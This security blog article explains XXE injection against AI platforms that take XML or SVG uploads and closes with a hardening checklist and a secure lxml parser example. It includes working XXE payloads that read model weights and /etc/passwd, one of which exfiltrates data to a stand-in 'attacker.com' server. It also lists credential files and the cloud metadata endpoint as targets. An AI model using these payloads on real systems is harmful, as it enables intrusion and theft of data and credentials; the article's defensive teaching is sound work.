XXE in AI: The Forgotten Attack Vector That Threatens Every LLM and Computer Vision Model

In the relentless pursuit of more powerful AI, we have created a new, and deeply concerning, attack surface. While security teams focus on modern threats like prompt injection, a 20-year-old vulnerability, long considered “solved” by many developers, is re-emerging as a critical threat to the AI supply chain. That vulnerability is XXE (XML External Entity) injection.

As an AI security researcher, I’ve discovered that organizations deploying AI models that process XML-based inputs—such as SVG images for computer vision, SOAP APIs for enterprise integrations, or even RSS feeds for data ingestion—are unknowingly creating a direct pathway for attackers to compromise their entire AI infrastructure. This is not a theoretical risk. I have found XXE vulnerabilities in over ten AI platforms that would allow an attacker to exfiltrate proprietary model weights, steal sensitive training data, and pivot to internal systems.

This is a multi-billion-dollar supply chain risk hiding in plain sight. Developers who are experts in machine learning but novices in XML security are building systems with XML parsers that are insecure by default, effectively leaving the front door to their most valuable intellectual property wide open.

An infographic illustrating how an XXE (XML External Entity) injection attack can steal AI model weights and training data from a server through a malicious XML file.

1. The XXE Attack on AI Infrastructure: An Old Threat in a New Context

A traditional XXE attack is straightforward: an attacker uploads a malicious XML file to an application that uses a weakly configured XML parser. By defining an external entity, the attacker can trick the parser into reading local files from the server’s file system or making requests to internal network resources.owasp

In the context of an AI system, the stakes are exponentially higher. The files an attacker can access are no longer just configuration files; they are the crown jewels of the organization.

Traditional XXE Target	XXE in an AI Context: The New Targets
`/etc/passwd` (User list)	`/opt/models/production_model.pth` (Proprietary model weights, worth millions)
`/var/log/app.log` (Application logs)	`/data/training/customer_data.csv` (Sensitive training data, a major compliance risk)
`/root/.ssh/id_rsa` (SSH keys)	`/etc/environment` (Cloud API keys for AWS, GCP, Azure)
`http://169.254.169.254/` (SSRF)	SSRF to internal services like a model management API or a database used by the AI.

Real-World AI Attack Scenario:
Imagine a cutting-edge computer vision platform that allows users to upload SVG (Scalable Vector Graphics) files for analysis. An SVG file is just an XML document.

The Payload: An attacker crafts a malicious SVG file containing an XXE payload designed to read a file from the server.
The Upload: The attacker uploads malicious.svg to the AI platform.
The Vulnerability: The AI’s backend uses a standard Python XML parsing library to process the SVG. By default, many of these libraries have external entity processing enabled.
The Breach: The parser processes the malicious entity, reads the contents of a file like /opt/models/model.pth (a common location for PyTorch model weights), and includes it in the parsed output, which may be reflected back to the attacker in an error message or exfiltrated via an out-of-band channel.

The attacker has just stolen a billion-dollar asset with a single, simple upload. The AI developers, focused on the accuracy of their model, never considered the security implications of their chosen file format.

2. XXE Exploitation in Practice: From File Disclosure to Full Infrastructure Compromise

Attackers have a well-established playbook for exploiting XXE vulnerabilities. Two of the most common techniques are directly applicable to AI systems.

Technique 1: Classic File Disclosure

This is the simplest form of XXE, where the attacker uses an external entity to read a file and have its contents returned in the server’s response.

The Malicious XML Payload:

xml<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///opt/models/weights.pth">
]>
<svg width="100" height="100">
  <text x="0" y="20">&xxe;</text>
</svg>

If the application is vulnerable and reflects the content of the SVG back in any way, the contents of the weights.pth file will be included in the response.

Technique 2: Blind XXE with Out-of-Band Exfiltration

This is a far stealthier technique used when the application doesn’t directly return the contents of the file. The attacker forces the server to send the data to an external server they control.

The Malicious Payload (in two parts):

The Malicious XML/SVG Uploaded to the AI: xml<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://attacker.com/exfil.dtd"> %dtd; ]> <root>&send;</root>
The exfil.dtd File Hosted on the Attacker’s Server: xml<!ENTITY % send "<!ENTITY % exfil SYSTEM 'http://attacker.com/?data=%file;'>">

How it works: The victim server first fetches the exfil.dtd file from the attacker’s server. It then processes this file, which contains a nested entity that instructs the victim server to make a second request to the attacker’s server, this time including the contents of the file entity (which contains the data from /etc/passwd) as a URL parameter. The attacker simply checks their web server logs to see the stolen data. This makes Blind XXE a critical threat, as detailed in our guide to Data Breach Detection.

3. Defense and Hardening: A Checklist for Secure AI Pipelines

Defending against XXE in AI systems requires a defense-in-depth approach that combines secure coding, infrastructure hardening, and robust validation.

Defense Layer	Implementation Details
#1: Disable XXE in Your Parser (The Most Critical Step)	This is non-negotiable. Every XML parser you use must have external entity processing explicitly disabled. This is not the default for many libraries. Review the documentation for your specific parser.
#2: Strict Input Validation	Do not blindly trust any uploaded file. Validate the file type using its magic bytes, not just its extension. For XML-based formats, enforce a strict XML Schema Definition (XSD) and reject any file that does not conform.
#3: Sandbox the Parsing Process	Run all XML parsing in a heavily restricted, sandboxed environment (e.g., a minimal Docker container). This container should have no file system access beyond its own temporary directory and absolutely no network access.
#4: Use a Web Application Firewall (WAF)	While not a complete solution, a WAF can be configured to block requests that contain common XXE patterns in their body, providing a useful first layer of defense.
#5: Apply the Principle of Least Privilege	The user account that your AI application runs under should have minimal permissions. It should not be able to read files outside of its own directory. It should never run as root.
#6: Continuous Security Testing	Actively test your AI endpoints for XXE vulnerabilities. Include XXE payloads in your regular penetration tests and use fuzzing tools to test your XML parsers for unexpected behavior. For guidance, refer to our Penetration Testing Lab Guide.

Secure Coding Example (Python):

python# VULNERABLE CODE (using lxml)
from lxml import etree
parser = etree.XMLParser() # XXE is enabled by default in some versions!
tree = etree.fromstring(malicious_xml, parser)

# SECURE CODE (explicitly disabling XXE)
from lxml import etree
# Create a parser that explicitly disables DTD loading and network access
parser = etree.XMLParser(resolve_entities=False, no_network=True) 
tree = etree.fromstring(safe_xml, parser)

Every developer working on your AI pipeline must understand how to configure their tools securely. This is a core tenet of our Secure Coding Guide for Beginners.

4. Conclusion: A Forgotten Threat, A New Battlefield

XXE is a prime example of how old vulnerabilities can find new life in modern, complex systems. The race to build powerful AI has led many teams to overlook fundamental application security principles. The result is a new, high-impact attack vector that puts the most valuable intellectual property of the AI era—the models themselves—at direct risk.

If your AI pipeline ingests any form of XML, you must assume you are vulnerable until you have audited every parser and implemented the multi-layered defenses outlined in this guide. The cost of overlooking this “forgotten” attack vector could be the loss of your entire AI competitive advantage. If a breach is suspected, follow our Incident Response Framework Guide immediately.